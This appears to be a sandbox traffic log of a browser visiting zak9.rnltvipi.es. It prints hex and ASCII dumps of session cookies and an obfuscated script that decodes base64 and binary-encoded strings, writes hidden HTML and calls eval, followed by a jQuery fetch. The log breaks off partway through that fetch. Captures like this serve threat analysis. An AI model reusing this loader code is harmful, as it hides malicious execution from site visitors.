2025-03-25 18:33:52 UTC	659	OUT	GET /ebY7FU/ HTTP/1.1 Host: zak9.rnltvipi.es Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 18:33:53 UTC	1214	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 18:33:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Thcb%2BhwYx%2Fl4j5%2F7yuAyKz93Wcymg7QNigmi4pKZ53suGtWCjar8dEOr%2BpBc5CWtn9zIesZ%2FJGRFByret8KPSKbxnuzKO%2FQKZO2Vj0U81ik91sQ6QQ%2FTPnSnBY9U"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} server-timing: cfL4;desc="?proto=TCP&rtt=42530&min_rtt=42469&rtt_var=15969&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1555&delivery_rate=67060&cwnd=158&unsent_bytes=0&cid=4a0271d67795c729&ts=292&x=0" Set-Cookie: XSRF-TOKEN=eyJpdiI6ImdwU3ZTazNGYXFOQTR6WDlSNXlNalE9PSIsInZhbHVlIjoiYXlJTys5dnAyUGJJaUFaclNnSFBuQlc0eVdyendhMzg2MWxXcVEraWpnbm1uenBDcTRUNXNXZjZ6VUhoUWtOSEMzcXJ2V1FKaDdUVlU0MlVMUjBCNVFUbCtGVXZabktWaXBBMElOdmN6a21tZVFJOUlqNTVxMnBZUXB3OFd0cDAiLCJtYWMiOiJhNmI0ODdmMDc0Njc4MGViYjIwMTI2MGY2MGE4OWIxNDcxMzZlNWY2YTNjOGY0MmVmYWZmYjM5YmE0NzJmOTA4IiwidGFnIjoiIn0%3D; expires=Tue, 25-Mar-2025 20:33:53 GMT; Max-Age=7200; path=/; secure; samesite=none
2025-03-25 18:33:53 UTC	766	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 68 4c 64 6c 56 55 62 48 6c 50 4f 57 5a 52 4c 31 46 7a 54 47 74 55 61 6e 55 79 4b 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 47 52 51 62 56 49 78 4d 6e 55 35 4e 45 74 6a 53 44 5a 53 63 6b 74 50 61 6d 74 43 53 32 64 74 65 6e 68 61 5a 6e 52 43 62 45 4e 6c 65 6b 6f 33 65 6a 5a 6d 62 6c 6c 48 52 44 5a 4e 64 46 70 49 62 6b 46 6e 51 57 78 54 64 45 39 5a 64 6c 70 34 55 57 74 4a 59 30 31 74 5a 30 4a 79 53 32 35 33 53 6b 74 4b 62 46 59 78 53 55 52 56 53 6b 4e 70 61 45 5a 51 4e 46 70 4e 59 56 68 45 5a 43 74 75 64 56 56 30 51 54 42 46 4f 46 6c 71 53 58 4e 47 63 6a 5a 30 53 6d 68 30 62 6c 64 78 65 58 70 57 5a 32 56 31 65 55 74 55 52 58 51 Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkhLdlVUbHlPOWZRL1FzTGtUanUyK2c9PSIsInZhbHVlIjoiMGRQbVIxMnU5NEtjSDZScktPamtCS2dtenhaZnRCbENleko3ejZmbllHRDZNdFpIbkFnQWxTdE9Zdlp4UWtJY01tZ0JyS253SktKbFYxSURVSkNpaEZQNFpNYVhEZCtudVV0QTBFOFlqSXNGcjZ0Smh0bldxeXpWZ2V1eUtURXQ
2025-03-25 18:33:53 UTC	758	IN	Data Raw: 37 38 62 66 0d 0a 3c 73 63 72 69 70 74 3e 0a 72 54 42 52 71 41 49 61 5a 56 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 36 59 57 73 35 4c 6e 4a 75 62 48 52 32 61 58 42 70 4c 6d 56 7a 4c 32 56 69 57 54 64 47 56 53 38 3d 22 29 3b 0a 4f 6c 5a 4e 75 6c 55 52 6c 67 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 6e 6a 4d 6f 49 63 68 4b 6c 62 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 72 54 42 52 71 41 49 61 5a 56 20 3d 3d 20 4f 6c 5a 4e 75 6c 55 52 6c 67 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 6e 6a 4d 6f 49 63 68 4b 6c 62 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f Data Ascii: 78bf<script>rTBRqAIaZV = atob("aHR0cHM6Ly96YWs5LnJubHR2aXBpLmVzL2ViWTdGVS8=");OlZNulURlg = atob("bm9tYXRjaA==");njMoIchKlb = atob("d3JpdGU=");if(rTBRqAIaZV == OlZNulURlg){document[njMoIchKlb](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
2025-03-25 18:33:53 UTC	1369	IN	Data Raw: 67 56 58 64 73 59 30 35 31 5a 31 4a 54 53 79 6b 70 43 69 41 67 49 43 41 67 49 43 35 71 62 32 6c 75 4b 43 63 6e 4b 54 73 4b 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 48 46 32 65 45 68 56 65 47 56 5a 52 46 63 67 50 53 42 59 63 47 35 55 5a 31 70 70 61 30 46 50 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 4c 79 35 37 4f 48 30 76 5a 79 77 67 57 47 74 42 56 45 78 34 59 57 31 45 64 53 41 39 50 67 6f 67 49 43 41 67 49 43 42 54 64 48 4a 70 62 6d 63 75 5a 6e 4a 76 62 55 4e 6f 59 58 4a 44 62 32 52 6c 4b 48 42 68 63 6e 4e 6c 53 57 35 30 4b 46 68 72 51 56 52 4d 65 47 46 74 52 48 55 73 49 44 49 70 4b 51 6f 67 49 43 41 67 4b 54 73 4b 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6c 64 6d 46 73 4b 48 46 32 65 45 68 56 65 47 56 5a 52 46 63 70 4f 77 6f 67 49 48 30 4b 66 54 73 4b 59 32 Data Ascii: gVXdsY051Z1JTSykpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IHF2eEhVeGVZRFcgPSBYcG5UZ1ppa0FPLnJlcGxhY2UoLy57OH0vZywgWGtBVEx4YW1EdSA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KFhrQVRMeGFtRHUsIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKHF2eEhVeGVZRFcpOwogIH0KfTsKY2
2025-03-25 18:33:53 UTC	1369	IN	Data Raw: 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b Data Ascii: pO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO+
2025-03-25 18:33:53 UTC	1369	IN	Data Raw: 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 Data Ascii: OOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oOOFpO++oOOF
2025-03-25 18:33:53 UTC	1369	IN	Data Raw: 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 Data Ascii: ++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFp
2025-03-25 18:33:53 UTC	1369	IN	Data Raw: 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f Data Ascii: +oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO
2025-03-25 18:33:53 UTC	1369	IN	Data Raw: 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b Data Ascii: pO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO+
2025-03-25 18:33:53 UTC	1369	IN	Data Raw: 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b Data Ascii: O++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++
2025-03-25 18:33:53 UTC	1369	IN	Data Raw: 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f Data Ascii: OFpOOFpO++oO++oOOFpO++oOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpOOFpO++oOOFpO++o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49695	151.101.194.137	443	4376	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 18:33:54 UTC	663	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://zak9.rnltvipi.es/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 18:33:54 UTC	565	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Tue, 25 Mar 2025 18:33:54 GMT Via: 1.1 varnish Age: 1596617 X-Served-By: cache-lga21957-LGA X-Cache: HIT X-Cache-Hits: 1088 X-Timer: S1742927635.546064,VS0,VE0 Vary: Accept-Encoding
2025-03-25 18:33:54 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-25 18:33:54 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2025-03-25 18:33:54 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2025-03-25 18:33:54 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2025-03-25 18:33:54 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 